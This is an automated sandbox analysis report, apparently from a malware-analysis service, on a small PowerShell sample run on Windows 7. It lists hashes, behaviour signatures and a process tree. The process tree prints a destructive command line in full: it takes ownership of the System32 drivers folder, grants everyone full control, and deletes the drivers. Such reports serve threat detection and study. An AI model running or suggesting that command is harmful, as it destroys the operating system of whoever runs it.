Analysis
max time kernel: 121s
max time network: 123s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 13-08-2024 20:53
Static task: static1
Behavioral task: behavioral1
Sample: script.ps1
Resource: win7-20240704-en
General
Target: script.ps1
Size: 373B
MD5: 138825370aacd69bec42b835e992d4e8
SHA1: e7ca9d34065b73a700b5e8a5ae568da4f5d54bff
SHA256: cc378cee3365c7a74a92c524e37ba3abfa2638b0365a20fcfe78d77a7a172731
SHA512: 93535adb74134f3d4f3a95a4585f10e19ddb800ffacd7044c676b4f74a6631254d15ee65fc1de11f83ab842397b22e2b2492ab7ecd3a5a106ff7f272b2c906ee
Malware Config
Signatures
Possible privilege escalation attempt (2 IoCs)
  Processes:
    pid   process
    2768  takeown.exe
    2716  icacls.exe
Modifies file permissions (1 TTPs, 2 IoCs)
  Processes:
    pid   process
    2768  takeown.exe
    2716  icacls.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid   process
    2864  powershell.exe
    2888  powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                      pid   process
    Token: SeDebugPrivilege          2864  powershell.exe
    Token: SeTakeOwnershipPrivilege  2768  takeown.exe
    Token: SeDebugPrivilege          2888  powershell.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description                        pid   process         target process
    PID 2864 wrote to memory of 2860   2864  powershell.exe  cmd.exe
    PID 2864 wrote to memory of 2860   2864  powershell.exe  cmd.exe
    PID 2864 wrote to memory of 2860   2864  powershell.exe  cmd.exe
    PID 2860 wrote to memory of 2768   2860  cmd.exe         takeown.exe
    PID 2860 wrote to memory of 2768   2860  cmd.exe         takeown.exe
    PID 2860 wrote to memory of 2768   2860  cmd.exe         takeown.exe
    PID 2860 wrote to memory of 2716   2860  cmd.exe         icacls.exe
    PID 2860 wrote to memory of 2716   2860  cmd.exe         icacls.exe
    PID 2860 wrote to memory of 2716   2860  cmd.exe         icacls.exe
    PID 2860 wrote to memory of 2888   2860  cmd.exe         powershell.exe
    PID 2860 wrote to memory of 2888   2860  cmd.exe         powershell.exe
    PID 2860 wrote to memory of 2888   2860  cmd.exe         powershell.exe
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2864
    C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && powershell"
      - Suspicious use of WriteProcessMemory
      PID: 2860
        C:\Windows\system32\takeown.exe
          Command line: takeown /f C:\Windows\System32\drivers\*
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
          PID: 2768
        C:\Windows\system32\icacls.exe
          Command line: icacls C:\Windows\System32\drivers\* /grant everyone:(f)
          - Possible privilege escalation attempt
          - Modifies file permissions
          PID: 2716
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2888
C:\Windows\system32\wbem\WMIADAP.EXE
  Command line: wmiadap.exe /F /T
  PID: 2052
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 3462f782ab8c74b75711d783319ada24
  SHA1: 65622f214bef2cec0dcdec8bf1026899be381eba
  SHA256: 76ac902daddda6f5d95432723720c94b455f8fb43aa7eee0f7bc62e01a1e15d3
  SHA512: c483db648918e7b19a83fc2a2d34765b23ac0eaa6a8b0cef1573c3cafaf7b0702652df5401a2a5b6c29679478a48f952353f0a3467dc55ef86f34affe8e257fa